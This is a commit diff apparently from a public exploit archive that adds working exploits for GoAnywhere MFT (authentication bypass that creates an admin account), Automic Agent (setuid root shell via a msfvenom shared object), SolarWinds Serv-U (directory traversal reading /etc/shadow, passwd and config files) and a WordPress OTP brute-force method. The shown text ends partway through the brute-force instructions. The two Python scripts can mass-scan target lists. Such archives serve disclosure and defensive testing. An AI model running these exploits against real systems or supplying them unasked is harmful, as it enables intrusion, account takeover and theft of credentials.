DB: 2025-05-30

7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
2025-05-30 00:16:26 +00:00 · 2025-05-30 00:16:26 +00:00 · c3b152279e
commit c3b152279e
parent d69eaacef8
7 changed files with 996 additions and 0 deletions
--- a/exploits/multiple/remote/52308.py
+++ b/exploits/multiple/remote/52308.py
@ -0,0 +1,338 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 # Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
 # Date: 2025-05-25
 # Exploit Author: @ibrahimsql
 # Exploit Author's github: https://github.com/ibrahimsql
 # Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft
 # Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial
 # Version: < 7.4.1
 # Tested on: Kali Linux 2024.1
 # CVE: CVE-2024-0204
 # Description:
 # Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability
 # that allows unauthenticated attackers to create an administrator account by exploiting a path traversal
 # vulnerability to access the initial account setup wizard. This exploit demonstrates two different
 # path traversal techniques to maximize successful exploitation across various server configurations.
 #
 # References:
 # - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/
 # - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability
 # - https://nvd.nist.gov/vuln/detail/cve-2024-0204
 import argparse
 import concurrent.futures
 import os
 import socket
 import sys
 from typing import List, Dict, Tuple, Optional, Union
 import requests
 from bs4 import BeautifulSoup
 from colorama import Fore, Style, init
 # Initialize colorama for cross-platform colored output
 init(autoreset=True)
 # Disable SSL warnings
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 # Constants
 DEFAULT_TIMEOUT = 10
 MAX_THREADS = 10
 USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
 PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
 SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml"
 class Banner:
    @staticmethod
    def show():
        banner = f"""{Fore.CYAN}
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ██╔═████╗╚════██╗██╔═████╗██║  ██║
 ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║
 ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║
 ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║      ╚██████╔╝███████╗╚██████╔╝     ██║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═════╝ ╚══════╝ ╚═════╝      ╚═╝
 {Style.RESET_ALL}
 {Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL}
 """
        print(banner)
 class GoAnywhereExploit:
    def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT):
        self.username = username
        self.password = password
        self.timeout = timeout
        self.headers = {"User-Agent": USER_AGENT}
        self.vulnerable_targets = []
        self.non_vulnerable_targets = []
        self.error_targets = []
    def check_target(self, target: str) -> Dict:
        """
        Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account
        Args:
            target: The target URL/domain to check
        Returns:
            Dict containing result information
        """
        result = {
            "target": target,
            "vulnerable": False,
            "message": "",
            "admin_created": False,
            "error": None
        }
        # Try primary exploit path first
        primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH)
        if primary_result["vulnerable"]:
            return primary_result
        # If primary path failed, try secondary exploit path
        print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...")
        secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH)
        if secondary_result["vulnerable"]:
            return secondary_result
        # If both paths failed, target is not vulnerable
        print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204")
        result["message"] = "Not vulnerable to CVE-2024-0204"
        self.non_vulnerable_targets.append(target)
        return result
    def _try_exploit_path(self, target: str, exploit_path: str) -> Dict:
        """
        Try to exploit the target using a specific exploit path
        Args:
            target: Target to exploit
            exploit_path: Path to use for exploitation
        Returns:
            Dict with exploitation results
        """
        result = {
            "target": target,
            "vulnerable": False,
            "message": "",
            "admin_created": False,
            "error": None
        }
        try:
            url = f"https://{target}{exploit_path}"
            session = requests.Session()
            # Initial check for vulnerability
            response = session.get(
                url,
                headers=self.headers,
                verify=False,
                timeout=self.timeout
            )
            # Determine if target is vulnerable based on response
            if response.status_code == 401:
                print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)")
                result["message"] = "Not vulnerable (401 Unauthorized)"
                return result
            if response.status_code != 200:
                print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})")
                result["message"] = f"Unexpected response (Status: {response.status_code})"
                return result
            # Target is potentially vulnerable
            print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!")
            result["vulnerable"] = True
            self.vulnerable_targets.append(target)
            # Extract ViewState token for the form submission
            try:
                soup = BeautifulSoup(response.text, "html.parser")
                view_state = soup.find('input', {'name': 'javax.faces.ViewState'})
                if not view_state or not view_state.get('value'):
                    print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}")
                    result["message"] = "Could not extract ViewState token"
                    return result
                # Prepare data for admin account creation
                data = {
                    "j_id_u:creteAdminGrid:username": self.username,
                    "j_id_u:creteAdminGrid:password_hinput": self.password,
                    "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
                    "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password,
                    "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
                    "j_id_u:creteAdminGrid:submitButton": "",
                    "createAdminForm_SUBMIT": 1,
                    "javax.faces.ViewState": view_state['value']
                }
                # Attempt to create admin account
                create_response = session.post(
                    url,
                    headers=self.headers,
                    data=data,
                    verify=False,
                    timeout=self.timeout
                )
                if create_response.status_code == 200:
                    print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}")
                    result["admin_created"] = True
                    result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}"
                else:
                    print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})")
                    result["message"] = f"Failed to create admin account (Status: {create_response.status_code})"
            except Exception as e:
                print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}")
                result["message"] = f"Error extracting form data: {str(e)}"
                result["error"] = str(e)
        except requests.exceptions.ConnectTimeout:
            print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout")
            result["message"] = "Connection timeout"
            result["error"] = "Connection timeout"
            self.error_targets.append(target)
        except requests.exceptions.ConnectionError:
            print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error")
            result["message"] = "Connection error"
            result["error"] = "Connection error"
            self.error_targets.append(target)
        except Exception as e:
            print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}")
            result["message"] = f"Error: {str(e)}"
            result["error"] = str(e)
            self.error_targets.append(target)
        return result
    def scan_targets(self, targets: List[str]) -> None:
        """
        Scan multiple targets concurrently
        Args:
            targets: List of targets to scan
        """
        with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
            executor.map(self.check_target, targets)
    def load_targets_from_file(self, file_path: str) -> List[str]:
        """
        Load targets from a file
        Args:
            file_path: Path to the file containing targets
        Returns:
            List of targets
        """
        if not os.path.exists(file_path):
            print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}")
            return []
        try:
            with open(file_path, "r") as f:
                return [line.strip() for line in f if line.strip()]
        except Exception as e:
            print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}")
            return []
    def print_summary(self) -> None:
        """Print a summary of the scanning results"""
        print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:")
        print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}")
        print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}")
        print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}")
        if self.vulnerable_targets:
            print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:")
            for target in self.vulnerable_targets:
                print(f"  - {target}")
 def validate_args(args):
    """Validate command line arguments"""
    if not args.target and not args.file:
        print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)")
        return False
    if args.file and not os.path.exists(args.file):
        print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}")
        return False
    if not args.username or not args.password:
        print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)")
        return False
    return True
 def main():
    """Main function"""
    parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit")
    parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')")
    parser.add_argument('-f', '--file', help="File containing targets, one per line")
    parser.add_argument('-u', '--username', help="Username for the admin account to create")
    parser.add_argument('-p', '--password', help="Password for the admin account to create")
    parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
    parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})")
    args = parser.parse_args()
    # Show banner
    Banner.show()
    # Validate arguments
    if not validate_args(args):
        parser.print_help()
        sys.exit(1)
    # Initialize exploit
    exploit = GoAnywhereExploit(
        username=args.username,
        password=args.password,
        timeout=args.timeout
    )
    # Handle single target
    if args.target:
        print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}")
        exploit.check_target(args.target)
    # Handle targets from file
    elif args.file:
        targets = exploit.load_targets_from_file(args.file)
        if not targets:
            print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file")
            sys.exit(1)
        print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file")
        print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n")
        exploit.scan_targets(targets)
    # Print summary
    exploit.print_summary()
 if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}")
        sys.exit(1)
--- a/exploits/multiple/remote/52309.txt
+++ b/exploits/multiple/remote/52309.txt
@ -0,0 +1,13 @@
 # Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
 # Date: 26.05.2025
 # Exploit Author: Flora Schäfer
 # Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
 # Version: <24.3.0 HF4, <21.0.13 HF1
 # Tested on: Linux
 # CVE : CVE-2025-4971
 1. Generate shared object file using msfvenom
 $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
 2. Run the ucxjlx6 executable as follows
 $ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
--- a/exploits/multiple/remote/52311.py
+++ b/exploits/multiple/remote/52311.py
@ -0,0 +1,408 @@
 # Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
 # Date: 2025-05-28
 # Exploit Author: @ibrahimsql
 # Exploit Author's github: https://github.com/ibrahimsql
 # Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server
 # Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration
 # Version: <= 15.4.2 HF1
 # Tested on: Kali Linux 2024.1
 # CVE: CVE-2024-28995
 # Description:
 # SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow
 # attackers to read sensitive files on the host machine. This exploit demonstrates multiple
 # path traversal techniques to access Serv-U log files and other system files on both
 # Windows and Linux systems.
 #
 # References:
 # - https://nvd.nist.gov/vuln/detail/cve-2024-28995
 # - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/
 # - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html
 # Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 import argparse
 import concurrent.futures
 import json
 import os
 import re
 import sys
 import time
 from concurrent.futures import ThreadPoolExecutor, as_completed
 from urllib.parse import urlparse
 import requests
 from colorama import Fore, Back, Style, init
 # Initialize colorama
 init(autoreset=True)
 # Disable SSL warnings
 try:
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 except ImportError:
    pass
 BASE_DIR = os.path.dirname(os.path.abspath(__file__))
 BANNER = rf'''
 {Fore.CYAN}
   ______     _______     ____   ___ ____  _  _        ____  ___  ___   ___  ____
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \( _ )/ _ \ / _ \| ___|
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ (_) \__, |\__, |___) |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____\___/  /_/   /_/|____/
 {Fore.YELLOW}
       SolarWinds Serv-U Directory Traversal Exploit
 {Fore.RED}       CVE-2024-28995 by @ibrahimsql
 {Style.RESET_ALL}
 '''
 class ScanResult:
    def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):
        self.url = url
        self.is_vulnerable = is_vulnerable
        self.version = version
        self.os_type = os_type
        self.file_content = file_content
        self.path = path
        self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
    def to_dict(self):
        return {
            "url": self.url,
            "is_vulnerable": self.is_vulnerable,
            "version": self.version,
            "os_type": self.os_type,
            "path": self.path,
            "timestamp": self.timestamp
        }
 def print_banner():
    print(BANNER)
 def normalize_url(url):
    """Normalize URL to ensure it has http/https protocol."""
    if not url.startswith('http'):
        url = f"https://{url}"
    return url.rstrip('/')
 def extract_server_version(headers):
    """Extract Serv-U version from server headers if available."""
    if 'Server' in headers:
        server_header = headers['Server']
        # Look for Serv-U version pattern
        match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header)
        if match:
            return match.group(1)
    return None
 def is_vulnerable_version(version):
    """Check if the detected version is vulnerable (15.4.2 HF1 or lower)."""
    if not version:
        return None
    try:
        # Split version numbers
        major, minor, patch = map(int, version.split('.'))
        # Vulnerable if lower than 15.4.2 HF2
        if major < 15:
            return True
        elif major == 15:
            if minor < 4:
                return True
            elif minor == 4:
                if patch <= 2:  # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable
                    return True
    except:
        pass
    return False
 def get_request(url, timeout=15):
    """Make a GET request to the specified URL."""
    try:
        response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)
        return response
    except requests.RequestException as e:
        return None
 def detect_os_type(content):
    """Detect the operating system type from the file content."""
    if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]):
        return "Linux"
    elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]):
        return "Windows"
    return None
 def get_default_payloads():
    """Return a list of directory traversal payloads specific to CVE-2024-28995."""
    return [
        # Windows payloads - Serv-U specific files
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"},
        {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"},
        {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"},
        {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"},
        {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"},
        {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"},
        # Verify Windows with various system files
        {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"},
        {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"},
        {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"},
        {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"},
        {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"},
        {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"},
        {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"},
        {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"},
        {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"},
        {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"},
        # Verify Linux with various system files
        {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"},
        {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"},
        {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"},
        {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"},
        {"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"},
        {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"},
        {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"},
        {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"},
        {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"},
        {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"}
    ]
 def create_custom_payload(directory, filename):
    """Create a custom payload with the specified directory and filename."""
    # Try both encoding styles
    payloads = [
        {"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"},
        {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"},
        {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"}
    ]
    return payloads
 def load_wordlist(wordlist_path):
    """Load custom paths from a wordlist file."""
    payloads = []
    try:
        with open(wordlist_path, 'r') as f:
            for line in f:
                line = line.strip()
                if line and not line.startswith('#'):
                    # Check if the line contains a directory and file separated by a delimiter
                    if ':' in line:
                        directory, filename = line.split(':', 1)
                        payloads.extend(create_custom_payload(directory, filename))
                    else:
                        # Assume it's a complete path
                        payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."})
        return payloads
    except Exception as e:
        print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}")
        return []
 def scan_target(url, custom_payloads=None):
    """Scan a target URL for the CVE-2024-28995 vulnerability."""
    url = normalize_url(url)
    result = ScanResult(url)
    # Try to get server version first
    try:
        response = get_request(url)
        if response and response.headers:
            result.version = extract_server_version(response.headers)
            vulnerable_version = is_vulnerable_version(result.version)
            if vulnerable_version is False:
                print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}")
                # Still continue scanning as version detection may not be reliable
    except Exception as e:
        pass
    # Get all payloads to try
    payloads = get_default_payloads()
    if custom_payloads:
        payloads.extend(custom_payloads)
    # Try each payload
    for payload in payloads:
        full_url = f"{url}{payload['path']}"
        try:
            print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}")
            response = get_request(full_url)
            if response and response.status_code == 200:
                content = response.text
                # Check if the response contains meaningful content
                if len(content) > 100:  # Arbitrary threshold to filter out error pages
                    os_type = detect_os_type(content)
                    if os_type:
                        result.is_vulnerable = True
                        result.os_type = os_type
                        result.file_content = content
                        result.path = payload['path']
                        print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}")
                        # Successful match - no need to try more payloads
                        return result
        except Exception as e:
            continue
    if not result.is_vulnerable:
        print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}")
    return result
 def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None):
    """Scan multiple targets using thread pool."""
    results = []
    custom_payloads = []
    # Add custom payloads if specified
    if custom_dir and custom_file:
        custom_payloads.extend(create_custom_payload(custom_dir, custom_file))
    # Add wordlist payloads if specified
    if wordlist:
        custom_payloads.extend(load_wordlist(wordlist))
    print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}")
    # Use fixed thread count of 10
    with ThreadPoolExecutor(max_workers=10) as executor:
        future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets}
        for future in as_completed(future_to_url):
            try:
                result = future.result()
                results.append(result)
            except Exception as e:
                print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}")
    return results
 def save_results(results, output_file):
    """Save scan results to a JSON file."""
    output_data = [result.to_dict() for result in results]
    try:
        with open(output_file, 'w') as f:
            json.dump(output_data, f, indent=2)
        print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
    except Exception as e:
        print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}")
 def save_vulnerable_content(result, output_dir):
    """Save the vulnerable file content to a file."""
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    # Create a safe filename from the URL
    parsed_url = urlparse(result.url)
    safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt"
    output_path = os.path.join(output_dir, safe_filename)
    try:
        with open(output_path, 'w') as f:
            f.write(f"URL: {result.url}\n")
            f.write(f"Path: {result.path}\n")
            f.write(f"Version: {result.version or 'Unknown'}\n")
            f.write(f"OS Type: {result.os_type or 'Unknown'}\n")
            f.write(f"Timestamp: {result.timestamp}\n")
            f.write("\n--- File Content ---\n")
            f.write(result.file_content)
        print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}")
    except Exception as e:
        print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}")
 def main():
    parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner")
    parser.add_argument("-u", "--url", help="Target URL")
    parser.add_argument("-f", "--file", help="File containing a list of URLs to scan")
    parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)")
    parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)")
    parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try")
    parser.add_argument("-o", "--output", help="Output JSON file to save results")
    args = parser.parse_args()
    print_banner()
    # Validate arguments
    if not args.url and not args.file:
        parser.print_help()
        print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}")
        sys.exit(1)
    targets = []
    # Get targets
    if args.url:
        targets.append(args.url)
    if args.file:
        try:
            with open(args.file, "r") as f:
                targets.extend([line.strip() for line in f.readlines() if line.strip()])
        except Exception as e:
            print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}")
            sys.exit(1)
    # Deduplicate targets
    targets = list(set(targets))
    if not targets:
        print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}")
        sys.exit(1)
    print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}")
    # Set output file
    output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json"
    # Start scanning
    results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist)
    # Process results
    vulnerable_count = sum(1 for result in results if result.is_vulnerable)
    print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}")
    print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}")
    print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}")
    # Save results
    save_results(results, output_file)
    # Save vulnerable file contents
    for result in results:
        if result.is_vulnerable and result.file_content:
            save_vulnerable_content(result, "vulnerable_files")
    print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}")
 if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
        sys.exit(0)
    except Exception as e:
        print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}")
        sys.exit(1)
--- a/exploits/multiple/webapps/52307.txt
+++ b/exploits/multiple/webapps/52307.txt
@ -0,0 +1,74 @@
 # Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
 # Google Dork: inurl:/wp-content/plugins/digits/
 # Date: 2025-04-30
 # Exploit Author: Saleh Tarawneh
 # Vendor Homepage: https://digits.unitedover.com/
 # Version: < 8.4.6.1
 # CVE : CVE-2025-4094
 """
 The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
 An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
 This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
 CWE-287: Improper Authentication
 CVSS v3.1: 9.8 (Critical)
 OWASP A2: Broken Authentication
 [Instructions]
 1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request.
 2. Copy the exact request parameters
 3. Replace the placeholder values in the script with real data from the intercepted request.
 4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
 [Alternative Method – Burp Suite Pro]
 If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
 1. Intercept the OTP request using Burp Proxy.
 2. Send the request to Intruder.
 3. Mark the `sms_otp` parameter as the payload position.
 4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
